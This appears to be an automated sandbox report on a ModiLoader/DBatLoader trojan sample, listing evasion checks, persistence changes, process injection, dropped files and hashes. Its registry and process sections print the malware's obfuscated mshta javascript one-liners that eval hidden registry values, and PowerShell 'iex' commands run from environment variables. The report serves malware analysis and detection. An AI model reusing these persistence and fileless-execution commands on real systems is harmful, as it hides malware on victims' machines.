Malware Analysis Report

2024-08-06 14:28

Sample ID 240528-ss613sbc73
Target 7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118
SHA256 b484d4b1ac36fcbb4150ef16848d69841a2498dba4101fe1549d8e1de0a17261
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b484d4b1ac36fcbb4150ef16848d69841a2498dba4101fe1549d8e1de0a17261

Threat Level: Known bad

The file 7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

Process spawned unexpected child process

ModiLoader, DBatLoader

Checks for common network interception software

Looks for VirtualBox Guest Additions in registry

Looks for VirtualBox drivers on disk

ModiLoader Second Stage

Looks for VMWare Tools registry key

Deletes itself

Checks BIOS information in registry

Checks computer location settings

Drops startup file

Adds Run key to start application

Maps connected drives based on registry

Suspicious use of SetThreadContext

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-28 15:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-28 15:24

Reported

2024-05-28 15:26

Platform

win7-20240508-en

Max time kernel

150s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94d0f9.lnk C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:dKfJY9=\"rOv\";oF0=new%20ActiveXObject(\"WScript.Shell\");lk2al1EO=\"L4aM\";s3dgg=oF0.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\bfow\\\\niegp\");X1Nvoc9a=\"T\";eval(s3dgg);KYutKG21=\"Db\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:au1pUF=\"544Ka\";T79P=new%20ActiveXObject(\"WScript.Shell\");AbnKC1n=\"168V8n9\";jlgo1=T79P.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");y6Z5vZ=\"UZR3nKj\";eval(jlgo1);AERA3A=\"yasFzJge\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\7358d4\\e5ae70.lnk\"" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2280 set thread context of 1364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1364 set thread context of 2324 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:K4CL4Ti=\"A\";f3e1=new ActiveXObject(\"WScript.Shell\");k0P3SOmp=\"xhs\";iT0xA=f3e1.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");zflEw0g4N=\"tEW\";eval(iT0xA);nSwb6pF3=\"dTc5XVT\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f\ = "2070de" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1616 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe
PID 2560 wrote to memory of 2280 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 1364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1364 wrote to memory of 2324 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:k6DCU="nXBpN5w";sb28=new%20ActiveXObject("WScript.Shell");wk4K2qT="fbQMI3jx";q5AFJ=sb28.RegRead("HKLM\\software\\Wow6432Node\\BBRZdKi\\qIaPDl");EY9cX1HE="eyC";eval(q5AFJ);Zw2Kom5W="o";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ramtbn

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto

Files

memory/1616-0-0x00000000002C0000-0x00000000002C4000-memory.dmp

memory/1952-1-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1616-3-0x0000000000400000-0x0000000000453000-memory.dmp

memory/1952-6-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1952-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1616-4-0x00000000002C0000-0x00000000002C4000-memory.dmp

memory/1952-7-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1952-8-0x0000000000440000-0x0000000000516000-memory.dmp

memory/1952-9-0x0000000000440000-0x0000000000516000-memory.dmp

memory/1952-10-0x0000000000440000-0x0000000000516000-memory.dmp

memory/1952-11-0x0000000000440000-0x0000000000516000-memory.dmp

memory/1952-12-0x0000000000440000-0x0000000000516000-memory.dmp

memory/1952-13-0x0000000000440000-0x0000000000516000-memory.dmp

memory/1952-14-0x0000000000440000-0x0000000000516000-memory.dmp

memory/2280-23-0x0000000006160000-0x0000000006236000-memory.dmp

memory/1364-25-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-27-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/2280-28-0x0000000006160000-0x0000000006236000-memory.dmp

memory/1364-29-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-35-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-38-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-43-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-33-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-34-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-32-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-31-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-30-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-37-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-51-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-58-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-61-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-50-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-49-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-67-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-68-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-48-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-47-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-46-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-45-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-44-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-42-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-41-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-40-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-39-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-60-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-57-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-56-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-36-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/2324-87-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-86-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-85-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-84-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-83-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-82-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-81-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-80-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-79-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-78-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-77-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-76-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-75-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-74-0x0000000000210000-0x0000000000351000-memory.dmp

C:\Users\Admin\AppData\Local\7358d4\6d45a7.bat

MD5 14adc766d85da95cd0990ed6bcc1524d
SHA1 e3c8f83a8fbfea658c9139d3e670d609745fb848
SHA256 0245cf83462c2d8f2453beb1094af0133caee498c1ab5147ee361cb8a449c1c4
SHA512 b4172624d668b6c1e7519cca9cbb53645ecc8b9aa1e4908801fd81983b092ed7ad26e3e29047ff5dc4e7744ee9f08dc61765133fa5957926cb4518127f4b60b8

C:\Users\Admin\AppData\Local\7358d4\2d9c5e.1879f4f

MD5 cbc555d14e9213767440945dd51086a0
SHA1 155b14f50c258bedcbeb17614ffbdba2dcbcc6c9
SHA256 f1edfee3805a4fa5a4643e27f0bf4f579e0f325f4d5eab9a0ac37f24c6be9267
SHA512 22620ac1ea284c92d3de76e68c1eaca854915b18434a1b2bb0262fe61c0431220475af9d92199b2b15799ae09bc2170dccf13f26128ce10bd05d208a1245e73e

C:\Users\Admin\AppData\Local\7358d4\e5ae70.lnk

MD5 7e7925dc5fb73c2cc7e6be937769a524
SHA1 2fc32ca2d072df177ce2239f6a8b55fa3f6046f2
SHA256 59b2af5649fbaa3827f1095521a6ba8a88c456a89af42298fbe1f6e226ced75e
SHA512 23a226f45efb625109f69ce8a780fd459dcd5b8f1a29f6113071097822f586ad321109f7c25a30c00ba2f9dbf06bd747ae2986e769b23e390c3963a690eebca3

C:\Users\Admin\AppData\Roaming\e53183\8858ab.1879f4f

MD5 c7475fc5708457d1d87855a369e5ee4e
SHA1 432d73767adbcc9fd3eb9c7dd44c21126f46bd61
SHA256 9bcec62ed16ea01fd5a8edb645533e85a063a3289fcd18f3d18b1f84b5da55f7
SHA512 5539fee94107870b2f71ae782ff41b1e46dc0ce5a079e123b0dbcbd8dae4aeac870eb89b8c07b946d19ca46e0791b707632c0679c5fcdcf9c6955e6a45ad4c1e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94d0f9.lnk

MD5 b256a7d842b284fe9567a9522359cfe0
SHA1 18da1a55a210290c2ee861443357e732b92be3e0
SHA256 b9b4a24ded6a58c25fc546de06eb82625d626f4e9747d196dcf4ce6178bc154c
SHA512 835fe86677c3737d24a5e8e97a6138cc3b883f045ee2fb071e911421b7de9fb1256d3fb3d79d8cbb5b79aaa54c7469b319ba7032678687a114ebf99c07926baa

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-28 15:24

Reported

2024-05-28 15:26

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:a5Cnx3JAb="fk";Mb6=new%20ActiveXObject("WScript.Shell");I6ly9aN="V";BbY1K5=Mb6.RegRead("HKLM\\software\\Wow6432Node\\nYj7fpIotm\\2bNAlkFA");ghSRm9Ud="lUGjIU";eval(BbY1K5);smB1L="2DGPnqY7";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:qgndum

Network

Country Destination Domain Proto

Files

memory/4976-0-0x00000000007C0000-0x00000000007C4000-memory.dmp

memory/4976-1-0x0000000000400000-0x0000000000453000-memory.dmp

memory/3908-3-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4976-4-0x00000000007C0000-0x00000000007C4000-memory.dmp

memory/3908-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/3908-2-0x0000000000400000-0x000000000043A000-memory.dmp

memory/3908-9-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/3908-10-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/3908-8-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/3908-7-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/3908-6-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/3908-11-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/3908-12-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/1728-14-0x00000000049D0000-0x0000000004A06000-memory.dmp

memory/1728-15-0x0000000005200000-0x0000000005828000-memory.dmp

memory/1728-16-0x0000000005020000-0x0000000005042000-memory.dmp

memory/1728-17-0x0000000005180000-0x00000000051E6000-memory.dmp

memory/1728-18-0x0000000005830000-0x0000000005896000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nujgg1oj.wgj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1728-28-0x0000000005940000-0x0000000005C94000-memory.dmp

memory/1728-29-0x0000000005DA0000-0x0000000005DBE000-memory.dmp

memory/1728-30-0x0000000005DE0000-0x0000000005E2C000-memory.dmp

memory/1728-31-0x00000000075B0000-0x0000000007C2A000-memory.dmp

memory/1728-32-0x0000000006E40000-0x0000000006E5A000-memory.dmp